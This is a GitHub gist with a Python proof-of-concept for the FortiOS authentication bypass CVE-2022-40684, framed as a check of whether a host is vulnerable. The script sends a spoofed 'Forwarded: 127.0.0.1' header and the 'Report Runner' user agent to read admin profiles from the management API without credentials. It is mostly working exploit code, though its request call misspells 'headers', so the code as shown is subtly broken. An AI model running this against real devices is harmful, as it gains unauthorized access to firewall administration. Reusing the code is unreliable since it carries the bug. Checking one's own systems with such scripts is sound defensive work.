Created
October 26, 2022 03:02
-
-
Save n0obit4/2537138a93eb2f40b0b2b254d978dc0c to your computer and use it in GitHub Desktop.
Check if you are vulnerable to "authentication bypass" vulnerability discovered on FortiOS.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # Made by: N0obit4 | |
| # https://github.com/n0obit4 | |
| # CVE-2022-40684 | |
| from requests import get, packages | |
| from sys import argv | |
| from urllib3.exceptions import InsecureRequestWarning | |
| # Suppress only the single warning from urllib3 needed. | |
| packages.urllib3.disable_warnings(category=InsecureRequestWarning) | |
| class FortiExploit: | |
| def __init__(self,ip): | |
| self.host = ip | |
| self.headers = { | |
| 'User-Agent':'Report Runner', | |
| 'Forwarded': 'for="[127.0.0.1]:8000";by="[127.0.0.1]:9000"', | |
| 'Content-Type': 'application/json' | |
| } | |
| ''' | |
| View into admin profiles if "super admin" profile exists. | |
| Commonly no one can view this information without previous authentication. | |
| ''' | |
| def check_if_vulnerable(self): | |
| url = f'https://{self.host}/api/v2/cmdb/system/admin' | |
| r = get(url, haders=self.headers, verify=False) | |
| if 'super_admin' in r.text: | |
| return True | |
| else: | |
| return False | |
| if __name__ == "__main__": | |
| if len(argv) == 2: | |
| app = FortiExploit(argv[1]) | |
| if app.check_if_vulnerable(): | |
| print('[+] Host is Vulnerable') | |
| print('See the following: https://www.fortiguard.com/psirt/FG-IR-22-377') | |
| else: | |
| print('[-] Host is not Vulnerable') | |
| else: | |
| print(f'Error, please run as: python3 {argv[0]} IP_ADDRESS') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment